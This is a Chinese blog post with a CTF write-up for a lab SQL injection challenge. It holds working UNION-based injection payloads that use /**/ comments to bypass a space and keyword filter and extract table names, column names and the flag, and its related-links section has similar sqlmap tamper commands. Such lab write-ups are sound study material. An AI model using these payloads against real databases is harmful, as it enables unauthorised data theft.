实验吧——简单的SQL注入2

最新推荐文章于 2022-05-30 17:32:35 发布
最新推荐文章于 2022-05-30 17:32:35 发布
阅读量140 收藏
点赞数
分类专栏: ctf 文章标签: CTF Web狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/94865980
版权

首先输入1,发现有将数据库的查询结果显示出来
输入单引号,发现错误,这时候可以猜测后台查询语句:select name from table where id=‘xxx’;
可以先尝试万能密码 ‘=’ 查询语句就变成
select name from table where id=’’=’’;
会把所以结果都显示出来一共三条记录
在这里插入图片描述
接下来继续测试,输入’=‘select,或者’=‘or等等发现仍然能显示三条记录
然后直接用burp进行fuzz看看那些敏感字符被过滤了在这里插入图片描述
fuzz完后你会发现’or’,’#’,‘union’,‘select’,‘where’,‘and’,空格 都过滤掉了
既然空格被过滤了,在SQL注入中,可以拿来当做间隔用的还有/**/
直接payload

'union/**/select/**/table_name/**/from/**/information_schema.columns/**/where/**/'1'='1

在这里插入图片描述
利用information_schema.columns表查询出所有表,其中发现flag表看似应该会有flag值
紧接着下一步就要查询flag表有什么字段了。
payload:

id='union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

在这里插入图片描述
查询发现flag表有两个字段flag和id
最后直接查询flag值
payload:

'union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

终于皇天不负有心人
在这里插入图片描述
flag{Y0u_@r3_5O_dAmn_90Od}

半只特立独行的猪
关注
专栏目录
【网络攻防技术】实验八——SQL注入实验
qq_45755706的博客
03-01 7191
文章目录一、实验题目二、实验步骤及结果Task 1: Get Familiar with SQL StatementsTask 2: SQL Injection Attack on SELECT StatementTask 2.1: SQL Injection Attack from webpage.Task 2.2: SQL Injection Attack from command line.Task 2.3: Append a new SQL statement.Task 3: SQL Injecti
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3712
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
[CTF]简单sql注入之2
胖胖的ALEX
06-26 654
类型:web 网址:http://www.shiyanbar.com/ctf/1908 攻击:sql注入 一句话总结: id有回显的sql注入(手工) Writeup: 测试发现过滤空格,用/**/代替空格 爆数据库名称: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/...
实验吧-简单sql注入之2
臭nana的博客
01-10 252
看到网上手工的wp那么多,就写一个sqlmap的 直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment 拿到flag
决斗场 - 实验WEB 简单sql注入2
RaAlGhul的博客
11-15 719
题目链接:http://www.shiyanbar.com/ctf/1908 简单sql注入……2? 做完这题感觉这题比起上一道题区别不大,如果大家对第一题的具体思路做法还不是很了解的话,这里给出小编第一题讲解的传送门:简单sql注入。 首先,进行上一题中的每一步测试,以及尝试提交上一题中得到flag的语句。 当然,如果上一题的语句能在这道题中得到flag那这题还有什么意义呢(
实验简单SQL注入2攻击笔记
JimGordonXu的博客
12-06 1390
背景:使用kali linux中的sqlmap 1.在进入sqlmao的终端界面后输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment --dbs 其中:1.sqlmap:启动sqlmap。2.-u:参数 指目标的URL。3.--tamper:绕过WAF脚本。4.space2co
SQL注入实验报告
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理与SQL注入工作原理,能够实现简单SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
实验吧——SQL注入 Write up(一)
Lemon's blog
08-05 515
前言:之前学习过了联合注入查询、布尔盲注、时间盲注等,这次就通过实验吧的SQL注入题来加强一下。 简单sql注入 输入有回显,且有输入框,那就可以用联合查询的方法来注入 题中提示已经过滤了一些关键字,那么就先来查看题中过滤的是哪些关键字 ?id=1 union select order by # 回显结果: union,select等都被过滤而且没有报错说明#也被过滤 可以自己建立一个语句...
网络攻防技术——SQL注入
学习记录
02-27 3179
一、题目 SQL注入是一种代码注入技术,它利用web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在web应用程序中正确检查时,就会出现此漏洞。许多web应用程序从用户处获取输入,然后使用这些输入构造SQL查询,这样web应用程序就可以从数据库中获取信息。Web应用程序还使用SQL查询在数据库中存储信息。这些是web应用程序开发中的常见做法。如果未仔细构造SQL查询,则可能会出现SQL注入漏洞。SQL注入攻击是对web应用程序最常见的攻击之一。 在本实验室中,我们创建了一
dvwa——sql注入
qq_45487671的博客
05-26 2653
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
20169205 2016-2017-2 实验SQL注入实验
weixin_30326515的博客
05-10 276
20169205 2016-2017-2 实验SQL注入实验 实验介绍 SQL注入技术是利用web应用程序和数据库服务器之间的接口来篡改网站内容的攻击技术。通过把SQL命令插入到Web表单提交框、输入域名框或页面请求框中,最终欺骗服务器执行恶意的SQL命令。 在这个实验中,我们使用web应用程序称为Collabtive。我们禁用Collabtive的若干防护措施,这样我们就创建了一个容易受到...
SQL注入使用
j1044957016的博客
05-30 1087
文章目录前言随着自己学习网络安全有段时间了,发现自己过于自信了,什么都学,什么都觉得自己懂了,掉过头来原理都记不住,无奈,只好从头开始整理,权当自己复习一遍了一、OWASP10二、SQL注入的原理1.SQL常出现场景2.SQL注入的分类3.SQL注入的一般步骤三、mysql的一些基本1.mysql中的注释风格2.mysql中的内联注释3.mysql中的union联合查询4.mysql中的 order by 语句5.information_schema结构总结 前言 随着自己学习网络安全有段时间了,发现自己
2021计算机应用基础形考任务作业一答案,国开网计算机应用基础(本)形考作业三答案...
weixin_35222747的博客
06-19 3032
一、单选题试题 :在PowerPoint中,若为幻灯片中的对象设置"飞入"效果,应选择____按钮。选择一项:A.自定义放映B.添加动画C.幻灯片版式D.幻灯处放映试题 :在向一个单元格输入公式或函数时,其前导字符必须是________。选择一项:A.>B.=C.<D.%试题 :在PowerPoint中,停止幻灯片播放的快捷键是____。选择一项:A.ShiftB.CtrlC.Ente...
简单SQL注入2
雨九九的小窝
10-25 758
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
实验简单sql注入
windseraph2的博客
05-19 2771
http://ctf5.shiyanbar.com/423/web/  知识点:当过滤空格时,通常用()或/**/代替空格 payload 1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
简单sql注入之2WP
热门推荐
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
实验吧三道sql注入题目解题思路以及当中至少点整理(简单SQL注入简单SQL注入2、简单SQL注入
xiaotaode2012的专栏
08-12 4093
0x00 最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理, 0x01 简单sql注入 做题的地址为: http://ctf5.shiyanbar.com/423/web/ 第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了
简单sql注入之2 / writeup (手工注入,纯属练手)
wewww111的博客
08-10 1949
多测试几次可以发现,空格被注释了,百度解决方法,用/**/代替空格的位置, 构造语句1'/**/or/**/'1'='1 确认为单引号注入 用order by 确认select字段数,以确定union的字段数 可得,只有一个字段 获取数据库  1'/**/union/**/select/**/schema_name/**/from/**/information_schema....
攻防世界|逆向|no-strings-attached
box
11-19 1621
GDB使用教程 1.文件识别 猜测:像这种没有后缀的文件多半的linux的 ELF。 直接拖进PE识别工具 elf/32位 现在kali运行运行一下 运行不了 2.IDA分析 首先Shift+F12 查看字符串好像还有可用的 ...
利用asc(mid())函数进行web_SQL注入攻击揭秘
接着,文档提到了实验环境——安徽大学经济学院电子商务的安全实验,其中着重探讨了SQL注入漏洞。SQL注入通常发生在B/S(浏览器/服务器)架构的应用程序中,由于程序员对用户输入数据的合法性判断不足,容易形成安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值